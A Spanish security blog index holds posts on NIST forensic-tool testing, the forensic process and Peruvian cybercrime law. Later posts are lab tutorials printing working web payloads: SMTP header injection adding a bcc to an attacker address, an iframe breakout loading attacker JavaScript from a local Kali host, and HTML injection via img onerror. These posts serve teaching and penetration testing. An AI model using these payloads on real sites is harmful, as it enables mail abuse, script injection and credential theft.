blog | Alonso Caballero / ReYDeS

Programa para Probar Herramientas Forenses de Computadoras (CFTT)

ReYDeS 8 March 2023

Body

Existe una necesidad crítica en la comunidad de la aplicación de la ley, para garantizar la confiabilidad de las herramientas forenses de computadoras. La meta del proyecto para probar herramientas forenses de computadoras (CFTT) del Instituto Nacional de Estándares y Tecnología (NIST), es establecer una metodología para probar herramientas de forense de computadoras, mediante el desarrollo de especificaciones generales de herramientas, procedimientos de prueba, criterios de prueba, conjuntos de prueba, y pruebas de hardware. Los resultados brindan la información necesaria para los fabricantes de herramientas las mejoren, para los usuarios tomen decisiones informadas sobre la adquisición y el uso de herramientas forenses de computadoras, además para las partes interesadas comprendan las capacidades de las herramientas. Se requiere una capacidad de garantizar las herramientas de software forense produzcan consistentemente resultados de prueba precisos y objetivos. El enfoque para probar herramientas forenses de computadoras se basa en metodologías internacionales muy reconocidas para pruebas de conformidad y pruebas de calidad.

El Programa de Pruebas para Herramientas de Forense de Computadoras es un proyecto de la División de Software y Sistemas respaldado por la Oficina de Programas Especiales y el Departamento de Seguridad Nacional. A través del proyecto Ciberforense de la División de Seguridad Cibernética, la Ciencia y Tecnología del Departamento de Seguridad Nacional se asocia con el proyecto NIST CFTT para proporcionar al público informes de prueba de herramientas forenses.

Descripción general de la metodología

La metodología de prueba desarrollada por NIST está impulsada por la funcionalidad. Las actividades de las investigaciones forenses se separan en funciones o categorías discretas, como la protección contra escritura del disco duro, la creación de imágenes del disco, la búsqueda de cadenas, etc. Luego se desarrolla una metodología de prueba para cada categoría.

El proceso de prueba de la CFTT está dirigido por un comité directivo compuesto por representantes de la comunidad relacionada con aplicación de la ley. Actualmente el comité directivo selecciona categorías de herramientas para investigación y herramientas dentro de una categoría para pruebas reales por parte del personal de CFTT. Un proveedor puede solicitar la prueba de una herramienta, sin embargo, el comité directivo toma la decisión sobre cuales herramientas probar.

1. Proceso para el desarrollo de especificaciones

Después de el comité directivo seleccione una categoría de herramienta y al menos una herramienta, el proceso de desarrollo es el siguiente:

El NIST y el personal encargado de hacer cumplir la ley desarrollan un documento de requisitos, afirmaciones, y casos de prueba (llamado especificación de categoría de herramienta)
La especificación de la categoría de la herramienta se publica en la web para la revisen los miembros de la comunidad forense de computadoras, y para otras partes interesadas la comenten públicamente.
Los comentarios y la retroalimentación relevantes se incorporan a la especificación.
Se diseña un entorno de prueba para la categoría de herramientas.

2. Proceso para la prueba de herramientas

Una vez se ha desarrollado una especificación de categoría, y se ha seleccionado una herramienta, el proceso de prueba es el siguiente:

NIST adquiere la herramienta a probar
NIST revisa la documentación de la herramienta
NIST selecciona los casos de prueba relevantes según las funciones admitidas por la herramienta
NIST desarrolla estrategia de prueba
NIST ejecuta pruebas
NIST produce un reporte de prueba
El Comité Directivo revisa el reporte de la prueba
El proveedor revisa el reporte de la prueba
NIST publica software de soporte en la web
DHS publica el reporte de la prueba en la web

Fuentes:

https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-…
https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-…
https://www.dhs.gov/science-and-technology/nist-cftt-reports

Read more about Programa para Probar Herramientas Forenses de Computadoras (CFTT)

Proceso Forense

ReYDeS 7 March 2023

Body

La meta más común al realizar un forense es ganar una mejor comprensión sobre un evento de interés, al encontrar y analizar los hechos relacionados con ese evento. El forense puede ser necesario en muchas situaciones diferentes, como la recolección de evidencia para procedimientos legales y acciones disciplinarias internas, además en el manejo de incidentes relacionados con malware, como también problemas operativos inusuales. Independientemente de la necesidad, el forense debe realizarse mediante un proceso de cuatro fases. Los detalles exactos de estas fases pueden variar según la necesidad específica del forense; las políticas, directrices y procedimientos de la organización deben indicar cualquier variación del procedimiento estándar.

Se describen las fases básicas del proceso forense: recolección, examen, análisis y reporte. Durante la recolección, los datos relacionados con un evento específico se identifican, etiquetan, registran y recopilan, además se preserva su integridad. En la segunda fase, se ejecutan herramientas y técnicas forenses de examen adecuadas para los tipos de datos recolectados, con el propósito de identificar y extraer la información relevante desde los datos recolectados mientras se protege su integridad. El examen puede usar una combinación de herramientas automatizadas y procesos manuales. La siguiente fase, el análisis, consiste en analizar los resultados del examen para obtener información útil el cual aborde las preguntas impulsando la realización de la recolección y el examen. La fase final implica reportar los resultados del análisis, lo cual puede incluir la descripción de las acciones realizadas, la determinación de cuales otras acciones deben realizarse, y la recomendación de mejoras a las políticas, directrices, procedimientos, herramientas y otros aspectos del proceso forense.

El proceso forense transforma los medios en evidencia, ya sea la evidencia sea necesaria para el cumplimiento de la ley, o para el uso interno de una organización. Específicamente, la primera transformación ocurre cuando se examinan los datos recolectados, lo cual los extrae desde el medio y los transforma hacia un formato el cual puede ser procesado por las herramientas forenses. En segundo lugar, los datos se transforman en información a través del análisis. Finalmente la transformación de la información en evidencia es análoga a la transferencia del conocimiento a la acción, usando la información producida por el análisis en una o más formas durante la fase de reporte. Por ejemplo, podría usarse como evidencia para ayudar a enjuiciar a un individuo específico, información factible de ser procesada para ayudar a detener o mitigar alguna actividad, o conocimiento en la generación de nuevas pistas para un caso.

Fuentes:

https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-8…

Read more about Proceso Forense

Ley de Delitos Informáticos - Ley Número 30096

ReYDeS 6 March 2023

Body

La Ley 30096 tiene por objeto prevenir y sancionar las conductas ilícitas que afectan los sistemas y datos informáticos y otros bienes jurídicos de relevancia penal, cometidas mediante la utilización de tecnologías de la información o de la comunicación, con la finalidad de garantizar la lucha eficaz contra la ciberdelincuencia.

La Ley Número 30171 modifica los siguientes artículos: art. 2do (Acceso ilícito), art. 3ero (Atentado a la integridad de datos informáticos), art. 4to (Atentado a la integridad de sistemas informáticos), art. 5to (Proposiciones a niños, niñas y adolescentes con fines sexuales por medios tecnológicos), art. 7mo (Interceptación de datos informáticos), art. 8vo (Fraude informático) y art. 10mo (Abuso de mecanismos y dispositivos informáticos) de la Ley 30096

Asimismo, modifican la tercera - Coordinación interinstitucional entre la Policía Nacional, el Ministerio Público y otros organismos especializados, cuarta - Cooperación operativa y undécima disposiciones complementarias finales Regulación e imposición de multas por el Organismo Supervisor de Inversión Privada en Telecomunicaciones de la Ley 30096

Por su parte, incorporan el artículo 12 a la Ley 30096.

Ley Número 30096, Ley de Delitos Informáticos, del 21 de octubre de 2013 y su modificatoria Ley Número 30171, de fecha 17 de febrero de 2014.

Esta publicación pertenece al compendio Normas sobre la Unidad Especializada en Ciberdelincuencia

Fuentes:

https://www.gob.pe/institucion/mpfn/informes-publicaciones/1678028-ley-…
https://busquedas.elperuano.pe/normaslegales/ley-de-delitos-informatico…
https://www.gob.pe/institucion/mpfn/colecciones/2453-normas-sobre-la-un…

Read more about Ley de Delitos Informáticos - Ley Número 30096

Manual para el Recojo de Evidencia Digital - Ministerio del Interior del Perú

ReYDeS 23 February 2023

Body

Actualmente, con el desarrollo de las tecnologías informáticas y la globalización mundial, la sociedad viene siendo víctima de diferentes tipos de delitos en los cuales están involucrados dispositivos tecnológicos, generándose la necesidad que el personal de la Policía Nacional del Perú esté capacitado y especializado para prevenir, investigar y combatir la delincuencia común y el crimen organizado en sus diferentes modalidades,siendo necesaria la creación de una herramienta importante que coadyuve en la investigación, a través de un manual.

El presente documento constituye un Manual para el Recojo de la Evidencia Digital y se convierte en una herramienta importante que permite guiar al personal policial interviniente en una investigación donde se encuentren involucrados dispositivos tecnológicos, para que ejecuten el recojo de dicha evidencia respetando la parte técnica y enviarla a la unidad especializada de la Policía Nacional del Perú para su respectivo análisis informático forense, garantizando la integridad de la evidencia.

El Ministerio del Interior, con la finalidad de establecer y unificar criterios en los procedimientos de recojo y tratamiento de dispositivos tecnológicos, ha elaborado el presente Manual para el Recojo de la Evidencia Digital, que será de aplicación para todo el personal de la Policía Nacional del Perú, con la finalidad de salvaguardar la evidencia digital con valor probatorio desde la etapa de investigación preliminar hasta la etapa de juzgamiento.

Fuentes:

https://www.gob.pe/institucion/mininter/informes-publicaciones/1199631-…
https://cdn.www.gob.pe/uploads/document/file/1303962/DWP-ManualParaReco…

Read more about Manual para el Recojo de Evidencia Digital - Ministerio del Interior del Perú

Evidencia Digital (NIST)

ReYDeS 16 February 2023

Body

¿Qué el forense digital? El forense digital es el campo de la ciencia forense la cual se ocupa de recuperar, almacenar, y analizar datos electrónicos, los cuales pueden ser útiles en investigaciones criminales. Esto incluye información de computadoras, discos duros, teléfonos móviles y otros dispositivos de almacenamiento de datos.

En años recientes, una muy variada fuente de recursos se han convertido en importantes, como vehículos de motor, drones aéreos, y la nube. Los investigadores forenses digitales enfrentan retos como la extracción de datos desde dispositivos dañados o destruidos, la localización de elementos individuales de evidencia entre vastas cantidades de datos, y asegurar sus métodos capturan los datos de forma fiable sin alterarlos de ninguna manera.

Los proyectos enumerados a continuación son sólo algunos ejemplos de cómo NIST ayuda a la comunidad forense digital para afrontar estos retos.

La Biblioteca Nacional para Referencia de Software es un archivo actualizado regularmente sobre aplicaciones de software conocidas y rastreables recopiladas por NIST. Se generan firmas digitales desde todos los archivos de este clasificador, para ser publicadas trimestralmente en un conjunto de datos de referencia (RDS). Cuando una organización de la fuerza legal incauta una computadora o un dispositivo móvil como parte de una investigación criminal, puede utilizar el RDS para identificar rápidamente los archivos conocidos desde ese dispositivo. Esto reduce el esfuerzo necesario para determinar cuales archivos son importantes como prueba y cuales no.

Existe una necesidad crítica en la comunidad de las fuerzas legales para garantizar la fiabilidad de las herramientas para el forense de computadoras. El programa para Evaluación de Herramientas Forenses de Computadoras establece una metodología para probar herramientas de software forense de computadoras, mediante el desarrollo de especificaciones generales de herramientas, procedimientos de prueba, criterios de prueba, conjuntos de pruebas y hardware de prueba. Los resultados ayudan a los fabricantes de las herramientas a mejorar sus productos, permitiendo a los usuarios elegir con conocimiento de causa cuales herramientas utilizar, además de proporcionar información hacia todas las partes interesadas sobre las capacidades de las diversas herramientas de cómputo utilizadas en las investigaciones forenses.

NIST tiene múltiples proyectos destinados a hacer avanzar las tecnologías de vídeo los cuales tienen aplicaciones forenses. Los proyectos actuales incluyen la detección de eventos en vídeos de vigilancia, la detección de eventos en vídeos de Internet, además de la detección y comprensión de imágenes las cuales han sido alteradas con respecto a su estado original.

NIST está trabajando en múltiples proyectos de reconocimiento biométrico basado en imágenes las cuales tienen aplicaciones forenses, con especial enfoque al reconocimiento de huellas dactilares, rostros, iris y tatuajes. Este trabajo tiene como meta avanzar en la ciencia de la medición, metodologías de evaluación, mejores prácticas, métricas para la calidad de imagen, interoperabilidad, y estándares biométricos.

El Programa de Ciencia Forense para Computación en la Nube de NIST tiene como meta mejorar la precisión, fiabilidad, validez científica, y utilidad de la ciencia forense en la nube. En apoyo de este proyecto, NIST ha creado el Grupo de Trabajo Público para Ciencia Forense de Computación en la Nube, para realizar investigaciones e identificar lagunas en la tecnología, las normas y las mediciones; para abordar diversos retos en la ciencia forense en la nube; y para desarrollar una arquitectura de referencia para la ciencia forense en la nube.

Fuentes:

https://www.nist.gov/digital-evidence
http://www.nsrl.nist.gov/
http://www.cftt.nist.gov/
https://www.nist.gov/programs-projects/video-analytics
https://www.nist.gov/itl/iad/image-group
https://www.nist.gov/programs-projects/nist-cloud-computing-forensic-sc…

Read more about Evidencia Digital (NIST)

Pruebas de Inyección IMAP SMTP

ReYDeS 25 January 2023

Body

Esta amenaza afecta a todas las aplicaciones comunicándose con servidores de correo (IMAP/SMTP), generalmente aplicaciones de correo web. El propósito de esta prueba es verificar la capacidad de inyectar comandos IMAP/SMTP arbitrarios en los servidores de correo, debido a los datos de entrada no están debidamente limpiados.

La técnica para Inyección IMAP/SMTP es más efectiva si el servidor de correo no es accesible directamente desde Internet. Cuando sea posible una comunicación completa con el servidor de correo back-end se recomienda realizar pruebas directas.

Una Inyección IMAP/SMTP posibilita acceder hacia un servidor de correo, lo cual de otro modo no sería accesible directamente desde Internet. En algunos casos estos sistemas internos no tienen el mismo nivel de protección y seguridad de infraestructura aplicada a los servidores front-end web. Por lo tanto, los resultados del servidor de correo pueden ser más vulnerables a los ataques de los usuarios finales.

El siguiente ejemplo expone una prueba para Inyección SMTP. Se ingresa al formulario donde es factible enviar un mensaje vía web

Se ingresan datos en el formulario.

Utilizando Zed Attack Proxy se evalúa como se realiza su envío y la respuesta devuelta.

Se procede a interceptar la petición y cambiar los datos definidos en el formulario por lo siguiente:
name=atacante\nbcc:atacante@gmail.com&reply-to=atacante@gmail.com&email=usuario@gmail.com&remarks=hola+victima&form=submit

El propósito es inyectar cabeceras para modificar la funcionalidad original, y enviar un mensaje de correo electrónico en base a los requerimientos del atacante.

La aplicación muestra un mensaje indicando “El mensaje ha sido enviado a nuestra abeja maestra”.

Para verificar el mensaje de correo haya sido exitosamente enviado se puede utilizar un servidor de correo electrónico de prueba, o en caso sea factible interceptar la comunicación.

Entre los propósitos de esta prueba se enumeran; identificar los puntos para inyección IMAP/SMTP, entender el flujo de datos y estructura de desarrollo del sistema, y evaluar los impactos de la inyección.

Fuentes:

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_A…

Read more about Pruebas de Inyección IMAP SMTP

Prueba de Inyección iFrame

ReYDeS 19 January 2023

Body

Una marco en línea (inline frame) es utilizado para incrustar otro documento dentro del documento HTML actual. Es decir se puede utilizara para una página web HTML sea incrustada dentro de otra página web correspondiente a un sitio web. Esto permite la inclusión de contenido desde fuentes externas, como publicidad en páginas web. Una inyección iFrame XSS es un ataque común de Cross-Site Scripting, el cual combina JavaScript malicioso con un iframe el cual carga una página legítima con el propósito de robar datos de un usuario desprevenido.

Este ataque frecuentemente tiene éxito cuando se combina con ingeniería social. Un ejemplo de ataque XSS por inyección de iFrame consistiría cuando un atacante convence al usuario para navegue hacia una página web controlada por el atacante. A continuación la página del atacante carga JavaScript malicioso en un iframe HTML el cual apunta hacia un sitio legítimo. Una vez que el usuario introduce sus credenciales en el sitio legítimo dentro del iframe, el JavaScript malicioso roba las pulsaciones de teclado.

Al analizar la respuesta devuelta por la aplicación, se visualiza el parámetro de nombre “ParamUrl” define el valor “robots.txt”.

En el cuerpo de la respuesta se visualiza la utilización de la etiqueta iframe para mostrar el contenido del archivo “robots.txt”

Para descubrir la la vulnerabilidad se cambia el valor del parámetro de nombre “ParamUrl” a lo siguiente:
robots.txt&ParamWidth=250&ParamHeight=250%22%3E%3C/iframe%3E%3Ciframe%20src=%22http://192.168.0.80/j.html%22%3E

La dirección corresponde a un servidor web ejecutándose en Kali Linux. El archivo de nombre “j.html” contiene el codigo JavaScript a ejecutar.

Se ha identificado y explotado exitosamente una inyección iFrame.

Fuentes:

https://www.radware.com/cyberpedia/application-security/iframe-injectio…
https://www.w3schools.com/tags/tag_iframe.ASP

Read more about Prueba de Inyección iFrame

Prueba de Inyección HTML Almacenada

ReYDeS 17 January 2023

Body

La inyección HTML es un tipo de vulnerabilidad de inyección producida cuando un usuario es capaz de controlar un punto de entrada, además de ser capaz de inyectar código HTML arbitrario en una página web vulnerable. Esta vulnerabilidad puede tener muchas consecuencias, como revelar cookies de sesión para un usuario, las cuales podrían utilizarse para suplantar la identidad de la víctima o, de forma más general, permitir al atacante modificar el contenido de la página visualizada por las víctimas.

Esta vulnerabilidad ocurre cuando la entrada del usuario no está correctamente limpiada, y la salida no está codificada. Una inyección permite al atacante enviar una página HTML maliciosa hacia una víctima. El navegador atacado no podrá distinguir (confiar) las partes legítimas de las partes maliciosas de la página y, en consecuencia, analizará y ejecutará toda la página en el contexto de la víctima.

Existen dos tipos principales de inyección HTML: reflejada y almacenada

La principal diferencia entre esos dos tipos de inyección es; el ataque de inyección almacenada ocurre cuando el código HTML malicioso se almacena en el servidor web, y se ejecuta cada vez el usuario llama a una funcionalidad adecuada.

Sin embargo, en el caso de un ataque de inyección reflejada, el código HTML malicioso no se almacena de forma permanente en el servidor web. La inyección reflejada ocurre cuando el sitio web responde inmediatamente ante la entrada maliciosa.

Existe una amplia diversidad de métodos y atributos factibles de utilizarse para renderizar contenido HTML. Si estos métodos se proporcionan con una entrada no fiable, entonces existe un alto riesgo para una vulnerabilidad de inyección HTML. Por ejemplo; se puede inyectar código HTML malicioso a través del método JavaScript innerHTML, el cual se utiliza para representar código HTML introducido por el usuario. Si las cadenas no se limpian correctamente, el método puede permitir la inyección de HTML. Una función de JavaScript factible de utilizarse con este fin es document.write().

Se ingresa y envía una entrada en el “Blog”.

Esta entrada del ususario es devuelta por la aplicación web, y mostrada al usuario, incluyendo otros datos adicionales, como el propietario y la fecha.

La vulnerabilidad puede ser identificada y explotada utilizando una entrada como, la cual es enviada en el cuerpo de la petición, pues se utiliza en método POST.

entry=%3Chtml%3E%3Cbody%3E%3Cimg+src%3D%27aaa%27+onerror%3Dalert%28%27ABC%27%29%3B%3E%3C%2Fbody%3E%3C%2Fhtml%3E&blog=submit&entry_add=

La entrada añade (inyecta) código HTML en el parámetro “entry” hacia la página. Pero no solo la añade, sino almacena de manera permanente esta entrada, la cual ejecutará el código insertado por el usuario malicioso en el contexto HTML.

El propósito de esta prueba es identificar los puntos de inyección, además de evaluar la severidad del contenido inyectado.

Fuentes:

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_A…
https://www.invicti.com/learn/html-injection/
https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML
https://developer.mozilla.org/en-US/docs/Web/API/Document/write

Read more about Prueba de Inyección HTML Almacenada

Prueba de Inyección HTML utilizando el Método POST

ReYDeS 13 January 2023

Body

La vulnerabilidad puede ser identificada y explotada utilizando interceptando la petición utilizando el método POST. Se ingresan datos en el formulario, para luego enviarlos hacia la aplicación.

Se define el modo interrupción en Zed Attack Proxy.

El modo interrupción en Zed Attack Proxy, permite editar los datos enviados a través del formulario.

Se cambia el valor del parámetro de nombre “firstname” a lo siguiente:
%3Chtml%3E%3Cbody%3E%3Cimg+src%3D%27aaa%27+onerror%3Dalert%28%27ABC%27%29%3B%3E%3C%2Fbody%3E%3C%2Fhtml%3E

Luego de realizada la modificación se procede a enviar la petición a través de Zed Attack Proxy.

Se ha identificado y explotado exitosamente la inyección HTML utilizando el método POST.

El propósito de esta prueba es identificar los puntos de inyección, además de evaluar la severidad del contenido inyectado.

Fuentes:

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_A…
https://www.zaproxy.org/
https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML
https://developer.mozilla.org/en-US/docs/Web/API/Document/write

Read more about Prueba de Inyección HTML utilizando el Método POST

Prueba de Inyección HTML

ReYDeS 12 January 2023

Body

La vulnerabilidad puede ser identificada y explotada utilizando una entrada como:
http:// 192. 168.0 .12/bWAPP/htmli_get.php?firstname=%3Chtml%3E%3Cbody%3E%3Cimg+src%3D%27aaa%27+onerror%3Dalert%28%27ABC%27%29%3B%3E%3C%2Fbody%3E%3C%2Fhtml%3E&lastname=perez&form=submit

La entrada añade (inyecta) código HTML en el parámetro “firstname” hacia la página, la cual ejecutará el código insertado por el usuario malicioso en el contexto HTML.